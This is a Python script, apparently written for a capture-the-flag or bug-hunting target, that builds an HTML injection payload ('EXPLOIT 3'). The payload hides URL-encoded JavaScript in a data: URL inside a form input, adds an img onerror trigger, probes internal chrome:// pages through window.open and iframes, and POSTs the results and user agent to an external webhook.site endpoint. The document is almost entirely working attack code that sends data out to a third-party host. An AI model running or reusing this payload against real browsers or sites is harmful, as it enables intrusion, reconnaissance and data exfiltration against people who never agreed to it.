#!/usr/bin/env python3
"""
EXPLOIT 3: Test various chrome:// URLs for access
With --no-sandbox, some internal Chrome pages might be accessible
"""

import urllib.parse
WEBHOOK = "https://webhook.site/YOUR-WEBHOOK-ID"  # Replace

# Try to access various chrome:// URLs and report back
code = f"""
(async () => {{
    const urls = [
        'chrome://version',
        'chrome://inspect/#pages',
        'chrome://inspect',
        'chrome://flags',
        'chrome://net-internals',
        'chrome://devtools/devtools_app.html'
    ];
    
    const results = {{}};
    
    for (const url of urls) {{
        try {{
            // Try to open in new window and check if it works
            const win = window.open(url, '_blank');
            results[url] = {{ success: !!win }};
            if (win) win.close();
        }} catch(e) {{
            results[url] = {{ error: e.toString() }};
        }}
    }}
    
    // Also try to iframe them
    const iframeResults = {{}};
    for (const url of urls) {{
        try {{
            const iframe = document.createElement('iframe');
            iframe.src = url;
            document.body.appendChild(iframe);
            iframeResults[url] = 'attempted';
        }} catch(e) {{
            iframeResults[url] = e.toString();
        }}
    }}
    
    await fetch('{WEBHOOK}', {{
        method: 'POST',
        body: JSON.stringify({{
            windowOpen: results,
            iframeAttempts: iframeResults,
            userAgent: navigator.userAgent
        }}, null, 2)
    }});
}})();
""".replace('\n', ' ')

encoded = urllib.parse.quote(code)

payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("=" * 80)
print("EXPLOIT 3: Test chrome:// URL Access")
print("=" * 80)
print("\nTests multiple chrome:// URLs to see which are accessible")
print("\nPAYLOAD:\n")
print(payload)
print("\n" + "=" * 80)